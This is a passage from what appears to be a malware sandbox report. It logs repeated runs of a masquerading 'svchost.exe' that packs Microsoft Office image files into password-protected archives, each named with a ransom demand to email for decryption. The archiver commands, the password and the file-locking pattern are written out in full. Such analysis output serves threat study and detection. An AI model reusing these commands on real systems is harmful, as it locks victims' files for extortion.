  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile_large.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile_large.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3360
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_school.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_school.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo_large.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo_large.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5180
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo_small.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo_small.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2656
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\TPN.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\TPN.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5012
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:5060
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:184
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4332
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:6044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1700
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4840
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3756
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4644
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3448
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3380
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4520
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3436
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4544
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5812
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5488
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2600
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
